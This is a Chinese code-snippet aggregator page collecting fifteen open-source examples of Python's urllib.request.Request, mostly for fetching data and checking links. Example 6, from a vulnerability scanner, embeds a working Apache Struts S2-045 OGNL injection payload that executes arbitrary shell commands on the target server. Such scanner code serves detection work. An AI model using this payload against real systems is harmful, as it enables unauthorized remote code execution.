当前位置: 首页>>代码示例>>Python>>正文


Python request.Request方法代码示例

本文整理汇总了Python中urllib.request.Request方法的典型用法代码示例。如果您正苦于以下问题:Python request.Request方法的具体用法?Python request.Request怎么用?Python request.Request使用的例子?那么恭喜您, 这里精选的方法代码示例或许可以为您提供帮助。您也可以进一步了解该方法所在urllib.request的用法示例。


在下文中一共展示了request.Request方法的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。

示例1: get_sdf

# 需要导入模块: from urllib import request [as 别名]
# 或者: from urllib.request import Request [as 别名]
def get_sdf(self):
        """Function to return the SDF (structure-data file) of the PubChem object."""
        from urllib.request import urlopen, Request
        from urllib.parse import quote
        from urllib.error import URLError

        if len(self.dataSDF) == 0:
            url = "https://pubchem.ncbi.nlm.nih.gov/rest/pug/compound/cid/{}/SDF?record_type=3d".format(
                quote(str(self.cid))
            )
            req = Request(url, headers={"Accept": "chemical/x-mdl-sdfile"})
            try:
                self.dataSDF = urlopen(req).read().decode("utf-8")
            except URLError as e:
                msg = "Unable to open\n\n%s\n\ndue to the error\n\n%s\n\n" % (url, e)
                msg += "It is possible that 3D information does not exist for this molecule in the PubChem database\n"
                print(msg)
                raise ValidationError(msg)
        return self.dataSDF 
开发者ID:MolSSI,项目名称:QCElemental,代码行数:21,代码来源:pubchem.py

示例2: hanlp_releases

# 需要导入模块: from urllib import request [as 别名]
# 或者: from urllib.request import Request [as 别名]
def hanlp_releases(cache=True):
    global HANLP_RELEASES
    if cache and HANLP_RELEASES:
        return HANLP_RELEASES
    # print('Request GitHub API')
    req = urllib.Request('http://nlp.hankcs.com/download.php?file=version')
    req.add_header('User-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36')
    if PY == 3:
        content = urllib.urlopen(req).read()
    else:
        content = urllib.urlopen(req).read()
    content = json.loads(content.decode())
    jar_version, jar_url, data_version, data_url = content
    meta = [(jar_version, jar_url, data_version, data_url)]
    HANLP_RELEASES = meta
    return meta 
开发者ID:hankcs,项目名称:pyhanlp,代码行数:18,代码来源:__init__.py

示例3: _http_request

# 需要导入模块: from urllib import request [as 别名]
# 或者: from urllib.request import Request [as 别名]
def _http_request(url, headers=None, time_out=10):
    """Perform an HTTP request and return request"""
    log(0, 'Request URL: {url}', url=url)

    try:
        if headers:
            request = Request(url, headers=headers)
        else:
            request = Request(url)
        req = urlopen(request, timeout=time_out)
        log(0, 'Response code: {code}', code=req.getcode())
        if 400 <= req.getcode() < 600:
            raise HTTPError('HTTP %s Error for url: %s' % (req.getcode(), url), response=req)
    except (HTTPError, URLError) as err:
        log(2, 'Download failed with error {}'.format(err))
        if yesno_dialog(localize(30004), '{line1}\n{line2}'.format(line1=localize(30063), line2=localize(30065))):  # Internet down, try again?
            return _http_request(url, headers, time_out)
        return None

    return req 
开发者ID:emilsvennesson,项目名称:script.module.inputstreamhelper,代码行数:22,代码来源:utils.py

示例4: HTML

# 需要导入模块: from urllib import request [as 别名]
# 或者: from urllib.request import Request [as 别名]
def HTML(self, check):
        try:
            if self.UserAgent != None:
                page_html = urlopen(Request(
                        self.target_url,
                        headers={"User-Agent":self.UserAgent}),
                        timeout=self.TimeOut).read().decode("utf-8")

            #If not, the default will be used
            else:
                page_html = urlopen(
                        self.target_url,
                        timeout=self.TimeOut).read().decode("utf-8")

        except HTTPError:
            page_html = "Can't get page source code"

        if self.verbose == True:
            print(" [+] Source code got from %s" % self.target_url)
            print("----START" + "-"*71)
            print(page_html)
            print("----END" + "-"*73)

        return(page_html) 
开发者ID:fnk0c,项目名称:dot2moon,代码行数:26,代码来源:connection.py

示例5: post

# 需要导入模块: from urllib import request [as 别名]
# 或者: from urllib.request import Request [as 别名]
def post(self, payload, request_par):
        data = parse.urlencode(request_par).encode()

        if self.UserAgent != None:
            req = Request(
                    self.target_url,
                    data=data, 
                    headers={"User-Agent":self.UserAgent})
            conn = urlopen(req, timeout=self.TimeOut)
        else:
            conn = urlopen(self.target_url,
                    data=data,
                    timeout=self.TimeOut)

        html = conn.read().decode("utf-8")
        page_size = len(html)

        if self.verbose == True:
            print(" [+] Source code got from %s" % payload)
            print("----START" + "-"*71)
            print(html)
            print("----END" + "-"*73)
        
        return(self.target_url, page_size, html, payload) 
开发者ID:fnk0c,项目名称:dot2moon,代码行数:26,代码来源:connection.py

示例6: st045

# 需要导入模块: from urllib import request [as 别名]
# 或者: from urllib.request import Request [as 别名]
def st045(self):
        try:
            cmd = self.linux
            header = dict()
            header[
                "User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
            header[
                "Content-Type"] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#iswin?(#cmd='" + cmd + "'):(#cmd='" + cmd + "')).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
            r = request.Request(self.url, headers=header)
            text = request.urlopen(r).read()
        except http.client.IncompleteRead as e:
            text = e.partial
        except Exception:
            pass
        if 'text' in locals().keys():
            self.random = str(self.random)
            if self.random.encode('utf-8') in text and len(text) < 15:
                self.result.append('Apache S2-045 Vulnerability: ' + self.url) 
开发者ID:al0ne,项目名称:Vxscan,代码行数:20,代码来源:apache_struts_all.py

示例7: _make_request

# 需要导入模块: from urllib import request [as 别名]
# 或者: from urllib.request import Request [as 别名]
def _make_request(self, opener, request, timeout=None):
        """Make the API call and return the response. This is separated into
           it's own function, so we can mock it easily for testing.

        :param opener:
        :type opener:
        :param request: url payload to request
        :type request: urllib.Request object
        :param timeout: timeout value or None
        :type timeout: float
        :return: urllib response
        """
        timeout = timeout or self.timeout
        try:
            return opener.open(request, timeout=timeout)
        except HTTPError as err:
            exc = handle_error(err)
            return exc 
开发者ID:d6t,项目名称:d6tpipe,代码行数:20,代码来源:client.py

示例8: retrieve_url_nodecode

# 需要导入模块: from urllib import request [as 别名]
# 或者: from urllib.request import Request [as 别名]
def retrieve_url_nodecode(url):
    """ Return the content of the url page as a string """
    req = Request(url, headers=headers)
    try:
        response = urlopen(req)
    except URLError as errno:
        print(" ".join(("Connection error:", str(errno.reason))))
        print(" ".join(("URL:", url)))
        return ""
    dat = response.read()
    # Check if it is gzipped
    if dat[:2] == '\037\213':
        # Data is gzip encoded, decode it
        compressedstream = StringIO(dat)
        gzipper = gzip.GzipFile(fileobj=compressedstream)
        extracted_data = gzipper.read()
        dat = extracted_data
        return dat
    return dat 
开发者ID:qbittorrent,项目名称:search-plugins,代码行数:21,代码来源:zooqle.py

示例9: submit

# 需要导入模块: from urllib import request [as 别名]
# 或者: from urllib.request import Request [as 别名]
def submit(self, data):
        from urllib.request import Request, urlopen
        data = json.dumps(data)
        data = data.encode("ASCII")
        req = Request(
            self.url,
            data=data,
            headers={
                "Content-Type": "application/json"
            }
        )
        # ToDo: parse response
        response = urlopen(req)
        # Debug:
        #from pprint import pprint
        #pprint(response) 
开发者ID:DinoTools,项目名称:dionaea,代码行数:18,代码来源:log_json.py

示例10: handle_link

# 需要导入模块: from urllib import request [as 别名]
# 或者: from urllib.request import Request [as 别名]
def handle_link(self, link):
        '''Send a HEAD request to the link, catch any pesky errors'''
        if not bool(urlparse(link).netloc):  # relative link?
            link = urljoin(self.home, link)
        try:
            req = Request(link, headers={'User-Agent': agent}, method='HEAD')
            status = request.urlopen(req).getcode()
        except urllib.error.HTTPError as e:
            print(f'HTTPError: {e.code} - {link}')  # (e.g. 404, 501, etc)
        except urllib.error.URLError as e:
            print(f'URLError: {e.reason} - {link}')  # (e.g. conn. refused)
        except ValueError as e:
            print(f'ValueError {e} - {link}')  # (e.g. missing protocol http)
        else:
            if self.verbose:
                print(f'{status} - {link}')
        if self.home in link:
            self.pages_to_check.appendleft(link)


# check for verbose tag 
开发者ID:healeycodes,项目名称:Broken-Link-Crawler,代码行数:23,代码来源:deadseeker.py

示例11: get_snap

# 需要导入模块: from urllib import request [as 别名]
# 或者: from urllib.request import Request [as 别名]
def get_snap(self, timeout: int = 3) -> Image or None:
        """
        Gets a "snap" of the current camera video data and returns a Pillow Image or None
        :param timeout: Request timeout to camera in seconds
        :return: Image or None
        """
        randomstr = ''.join(random.choices(string.ascii_uppercase + string.digits, k=10))
        snap = self.url + "?cmd=Snap&channel=0&rs=" \
               + randomstr \
               + "&user=" + self.username \
               + "&password=" + self.password
        try:
            req = request.Request(snap)
            req.set_proxy(Request.proxies, 'http')
            reader = request.urlopen(req, timeout)
            if reader.status == 200:
                b = bytearray(reader.read())
                return Image.open(io.BytesIO(b))
            print("Could not retrieve data from camera successfully. Status:", reader.status)
            return None

        except Exception as e:
            print("Could not get Image data\n", e)
            raise 
开发者ID:Benehiko,项目名称:ReolinkCameraAPI,代码行数:26,代码来源:recording.py

示例12: get_access_token

# 需要导入模块: from urllib import request [as 别名]
# 或者: from urllib.request import Request [as 别名]
def get_access_token(self, code, state=None):
        '''
        In callback url: http://host/callback?code=123&state=xyz
        use code and state to get an access token.
        '''
        kw = dict(client_id=self._client_id, client_secret=self._client_secret, code=code)
        if self._redirect_uri:
            kw['redirect_uri'] = self._redirect_uri
        if state:
            kw['state'] = state
        opener = build_opener(HTTPSHandler)
        request = Request('https://github.com/login/oauth/access_token', data=_encode_params(kw))
        request.get_method = _METHOD_MAP['POST']
        request.add_header('Accept', 'application/json')
        try:
            response = opener.open(request, timeout=TIMEOUT)
            r = _parse_json(response.read())
            if 'error' in r:
                raise ApiAuthError(str(r.error))
            return str(r.access_token)
        except HTTPError as e:
            raise ApiAuthError('HTTPError when get access token') 
开发者ID:famavott,项目名称:osint-scraper,代码行数:24,代码来源:githubpy.py

示例13: e_tipo_fii

# 需要导入模块: from urllib import request [as 别名]
# 或者: from urllib.request import Request [as 别名]
def e_tipo_fii(ticker):

    ticker_corrigido = ticker

    if ticker.endswith('12'):
        ticker_corrigido = ticker.replace('12', '11')

    try:
        url = "https://www.fundsexplorer.com.br/funds/%s" % (ticker_corrigido)

        # Making the website believe that you are accessing it using a Mozilla browser
        req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
        webpage = urlopen(req).read()

        soup = BeautifulSoup(webpage, 'html.parser')
        # html = soup.prettify('utf-8')

        titles = soup.findAll('h1', attrs={'class': 'section-title'})
        if len(titles):
            return True
        else:
            return False
    except:
        return False 
开发者ID:guilhermecgs,项目名称:ir,代码行数:26,代码来源:crawler_funds_explorer_bs4.py

示例14: busca_preco_atual

# 需要导入模块: from urllib import request [as 别名]
# 或者: from urllib.request import Request [as 别名]
def busca_preco_atual(ticker):
    if ticker in __cache__:
        return __cache__[ticker]
    try:
        ticker_sa = ticker + '.SA'
        url = "http://finance.yahoo.com/quote/%s?p=%s" % (ticker_sa, ticker_sa)

        # Making the website believe that you are accessing it using a Mozilla browser
        req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
        webpage = urlopen(req).read()

        time.sleep(1)

        soup = BeautifulSoup(webpage, 'html.parser')
        # html = soup.prettify('utf-8')

        for span in soup.findAll('span', attrs={'class': 'Trsdu(0.3s) Trsdu(0.3s) Fw(b) Fz(36px) Mb(-4px) D(b)'}):
            preco_atual = float(span.text.replace(',', '').strip())
            __cache__[ticker] = preco_atual
            return preco_atual
        raise Exception('Preco ticker nao encontrado ' + ticker)
    except Exception as ex:
        raise Exception('Preco ticker nao encontrado ' + ticker, ex) 
开发者ID:guilhermecgs,项目名称:ir,代码行数:25,代码来源:crawler_yahoo_bs4.py

示例15: get_rdf_from_web

# 需要导入模块: from urllib import request [as 别名]
# 或者: from urllib.request import Request [as 别名]
def get_rdf_from_web(url):
    headers = {'Accept':
               'text/turtle, application/rdf+xml, '
               'application/ld+json, application/n-triples,'
               'text/plain'}
    r = request.Request(url, headers=headers)
    resp = request.urlopen(r)
    code = resp.getcode()
    if not (200 <= code <= 210):
        raise RuntimeError("Cannot pull RDF URL from the web: {}, code: {}"
                           .format(url, str(code)))
    known_format = None
    content_type = resp.headers.get('Content-Type', None)
    if content_type:
        if content_type.startswith("text/turtle"):
            known_format = "turtle"
        elif content_type.startswith("application/rdf+xml"):
            known_format = "xml"
        elif content_type.startswith("application/xml"):
            known_format = "xml"
        elif content_type.startswith("application/ld+json"):
            known_format = "json-ld"
        elif content_type.startswith("application/n-triples"):
            known_format = "nt"
    return resp, known_format 
开发者ID:RDFLib,项目名称:pySHACL,代码行数:27,代码来源:load.py


注:本文中的urllib.request.Request方法示例由纯净天空整理自Github/MSDocs等开源代码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。